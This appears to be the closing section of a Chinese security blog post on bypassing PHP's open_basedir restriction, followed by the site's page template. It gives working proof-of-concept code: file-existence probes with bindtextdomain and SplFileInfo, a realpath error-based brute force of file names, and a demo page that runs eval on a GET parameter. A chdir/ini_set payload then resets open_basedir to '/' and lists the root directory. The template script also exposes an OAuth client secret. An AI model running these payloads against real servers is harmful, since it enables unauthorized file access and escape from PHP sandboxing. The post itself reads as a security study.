<h2 id="利用bindtextdomain和SplFileInfo方法"><a href="#利用bindtextdomain和SplFileInfo方法" class="headerlink" title="利用bindtextdomain和SplFileInfo方法"></a>利用bindtextdomain和SplFileInfo方法</h2><p>bindtextdomain设置或获取域名的路径，函数原型为:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">bindtextdomain(<span class="hljs-keyword">string</span> <span class="hljs-variable">$domain</span>, ?<span class="hljs-keyword">string</span> <span class="hljs-variable">$directory</span>): <span class="hljs-keyword">string</span>|<span class="hljs-literal">false</span><br></code></pre></td></tr></table></figure>

<p>利用原理是基于报错：<code>bindtextdomain()</code>函数的第二个参数$directory是一个文件路径，它会在$directory存在的时候返回$directory，不存在则返回false。<br><code>SplFileInfo</code>函数类似。<br>poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>printf(<span class="hljs-string">&#x27;&lt;b&gt;open_basedir: %s&lt;/b&gt;&lt;br /&gt;&#x27;</span>, ini_get(<span class="hljs-string">&#x27;open_basedir&#x27;</span>));<br><span class="hljs-variable">$re</span> = bindtextdomain(<span class="hljs-string">&#x27;xxx&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;dir&#x27;</span>]);<br>var_dump(<span class="hljs-variable">$re</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>printf(<span class="hljs-string">&#x27;&lt;b&gt;open_basedir: %s&lt;/b&gt;&lt;br /&gt;&#x27;</span>, ini_get(<span class="hljs-string">&#x27;open_basedir&#x27;</span>));<br><span class="hljs-variable">$info</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">SplFileInfo</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;dir&#x27;</span>]);<br>var_dump(<span class="hljs-variable">$info</span>-&gt;getRealPath());<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>如果成功访问到存在的文件是会返回该文件路径：<br><img src="/img/bypass_open_basedir/12.png" srcset="/img/loading.gif" lazyload></p>
<p>而如果访问到不存在的文件就会返回<code>false</code><br><img src="/img/bypass_open_basedir/13.png" srcset="/img/loading.gif" lazyload></p>
<p>这个方法感觉非常鸡肋,用起来比较恶心，最好与其他方法组合使用。</p>
<h2 id="利用SplFileInfo-getRealPath-方法"><a href="#利用SplFileInfo-getRealPath-方法" class="headerlink" title="利用SplFileInfo::getRealPath()方法"></a>利用SplFileInfo::getRealPath()方法</h2><p>(PHP 5 &gt;= 5.1.2, PHP 7, PHP 8)<br>SplFileInfo类为单个文件的信息提供了一个高级的面向对象的接口。<br>而其中<code>getRealPath()</code>用于获取文件的绝对路径。bypass原理同样是基于报错，该方法在获取文件路径的时候，如果存入一个不存在的路径时，会返回false，否则返回绝对路径，而且他还直接忽略了open_basedir的设定。</p>
<p>脚本如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>ini_set(<span class="hljs-string">&#x27;open_basedir&#x27;</span>, dirname(<span class="hljs-keyword">__FILE__</span>));<br>printf(<span class="hljs-string">&quot;open_basedir: %s &lt;br/&gt;&lt;br/&gt;&quot;</span>, ini_get(<span class="hljs-string">&#x27;open_basedir&#x27;</span>));<br><span class="hljs-variable">$basedir</span> = <span class="hljs-string">&#x27;D:/CSGO/&#x27;</span>;<br><span class="hljs-variable">$arr</span> = <span class="hljs-keyword">array</span>();<br><span class="hljs-variable">$chars</span> = <span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyz0123456789&#x27;</span>;<br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; strlen(<span class="hljs-variable">$chars</span>); <span class="hljs-variable">$i</span>++) &#123;<br>    <span class="hljs-variable">$info</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">SplFileInfo</span>(<span class="hljs-variable">$basedir</span> . <span class="hljs-variable">$chars</span>[<span class="hljs-variable">$i</span>] . <span class="hljs-string">&#x27;&lt;&lt;&#x27;</span>);<br>    <span class="hljs-variable">$re</span> = <span class="hljs-variable">$info</span>-&gt;getRealPath();<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$re</span>) &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$re</span>.<span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<p><img src="/img/bypass_open_basedir/14.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用realpath列目录"><a href="#利用realpath列目录" class="headerlink" title="利用realpath列目录"></a>利用realpath列目录</h2><p>环境要求:Windows</p>
<p>realpath()返回规范化的绝对路径名,它可以去掉多余的../或./等跳转字符，能将相对路径转换成绝对路径。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">realpath(<span class="hljs-keyword">string</span> <span class="hljs-variable">$path</span>): <span class="hljs-keyword">string</span>|<span class="hljs-literal">false</span><br></code></pre></td></tr></table></figure>

<p>bypass原理:<br>与上面说到的两种方式类似。在开启了open_basedir的情况下，如果我们传入一个不存在的文件名，会返回false，但是如果我们传入一个不在open_basedir里的文件的话，他就会返回<code>file is not within the allowed path(s)</code>，有点像盲注,基于报错来判断文件名。</p>
<p>脚本入下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>ini_set(<span class="hljs-string">&#x27;open_basedir&#x27;</span>, dirname(<span class="hljs-keyword">__FILE__</span>));<br>printf(<span class="hljs-string">&quot;&lt;b&gt;open_basedir: %s&lt;/b&gt;&lt;br /&gt;&quot;</span>, ini_get(<span class="hljs-string">&#x27;open_basedir&#x27;</span>));<br>set_error_handler(<span class="hljs-string">&#x27;isexists&#x27;</span>);<br><span class="hljs-variable">$dir</span> = <span class="hljs-string">&#x27;D:/5E/5EClient/&#x27;</span>;<br><span class="hljs-variable">$file</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br><span class="hljs-variable">$chars</span> = <span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyz0123456789_&#x27;</span>;<br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; strlen(<span class="hljs-variable">$chars</span>); <span class="hljs-variable">$i</span>++) &#123;<br>        <span class="hljs-variable">$file</span> = <span class="hljs-variable">$dir</span> . <span class="hljs-variable">$chars</span>[<span class="hljs-variable">$i</span>] . <span class="hljs-string">&#x27;&lt;&gt;&lt;&#x27;</span>;<br>        realpath(<span class="hljs-variable">$file</span>);<br>&#125;<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">isexists</span>(<span class="hljs-params"><span class="hljs-variable">$errno</span>, <span class="hljs-variable">$errstr</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>        <span class="hljs-variable">$regexp</span> = <span class="hljs-string">&#x27;/File\((.*)\) is not within/&#x27;</span>;<br>        preg_match(<span class="hljs-variable">$regexp</span>, <span class="hljs-variable">$errstr</span>, <span class="hljs-variable">$matches</span>);<br>        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$matches</span>[<span class="hljs-number">1</span>])) &#123;<br>                printf(<span class="hljs-string">&quot;%s &lt;br/&gt;&quot;</span>, <span class="hljs-variable">$matches</span>[<span class="hljs-number">1</span>]);<br>        &#125;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/bypass_open_basedir/11.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="利用chdir与ini-set"><a href="#利用chdir与ini-set" class="headerlink" title="利用chdir与ini_set"></a>利用chdir与ini_set</h2><p><code>chdir</code>将工作目录切换到指定的目录,函数原型为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">chdir(<span class="hljs-keyword">string</span> <span class="hljs-variable">$directory</span>): <span class="hljs-keyword">bool</span><br></code></pre></td></tr></table></figure>

<p><code>ini_set</code>i用来设置php.ini的值，无需打开php.ini文件，就能修改配置。函数原型为:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">ini_set(<span class="hljs-keyword">string</span> <span class="hljs-variable">$option</span>, <span class="hljs-keyword">string</span> <span class="hljs-variable">$value</span>): <span class="hljs-keyword">string</span>|<span class="hljs-literal">false</span><br></code></pre></td></tr></table></figure>
<p>设置指定配置选项的值。这个选项会在脚本运行时保持新的值，并在脚本结束时恢复。</p>
<p>bypass原理大概open_basedir设计逻辑的安全问题<br>分析过程参考:<a target="_blank" rel="noopener" href="https://skysec.top/2019/04/12/%E4%BB%8EPHP%E5%BA%95%E5%B1%82%E7%9C%8Bopen-basedir-bypass/">从PHP底层看open_basedir bypass</a></p>
<p>一个小demo，将该文件放到网站目录下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;open_basedir: &#x27;</span>.ini_get(<span class="hljs-string">&#x27;open_basedir&#x27;</span>).<span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;GET: &#x27;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>].<span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>;<br><span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>]);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;open_basedir: &#x27;</span>.ini_get(<span class="hljs-string">&#x27;open_basedir&#x27;</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">mkdir(<span class="hljs-string">&#x27;sub&#x27;</span>);chdir(<span class="hljs-string">&#x27;sub&#x27;</span>);ini_set(<span class="hljs-string">&#x27;open_basedir&#x27;</span>,<span class="hljs-string">&#x27;..&#x27;</span>);chdir(<span class="hljs-string">&#x27;..&#x27;</span>);chdir(<span class="hljs-string">&#x27;..&#x27;</span>);chdir(<span class="hljs-string">&#x27;..&#x27;</span>);chdir(<span class="hljs-string">&#x27;..&#x27;</span>);ini_set(<span class="hljs-string">&#x27;open_basedir&#x27;</span>,<span class="hljs-string">&#x27;/&#x27;</span>);var_dump(scandir(<span class="hljs-string">&#x27;/&#x27;</span>));<br></code></pre></td></tr></table></figure>

<p><img src="/img/bypass_open_basedir/15.png" srcset="/img/loading.gif" lazyload><br>open_basedir被设置成了’&#39;,失去原有的限制。</p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><p><a target="_blank" rel="noopener" href="https://www.mi1k7ea.com/2019/07/20/%E6%B5%85%E8%B0%88%E5%87%A0%E7%A7%8DBypass-open-basedir%E7%9A%84%E6%96%B9%E6%B3%95/">浅谈几种Bypass open_basedir的方法</a><br><a target="_blank" rel="noopener" href="http://diego.team/2020/07/28/PHP-bypass-open_basedir/">PHP bypass open_basedir</a><br><a target="_blank" rel="noopener" href="https://www.leavesongs.com/bypass-open-basedir-readfile.html">php5全版本绕过open_basedir读文件脚本</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处，表明作者SD！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/08/19/CVE-2021%E2%80%9326855%E4%B8%8ECVE-2021%E2%80%9327065/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">CVE-2021–26855与CVE-2021–27065漏洞分析及复现</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/08/05/bypass_disable_function/">
                        <span class="hidden-mobile">浅析Bypass disable_functions</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"d3fed93d8ca9dd026b6a","clientSecret":"b3ebb466a8206df623c10df13110073b40137bdb","repo":"SD-XD.github.io","owner":"SD-XD","admin":["SD-XD"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":true,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: 'ac68565d7fea82f35ed2a3b86be060de'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
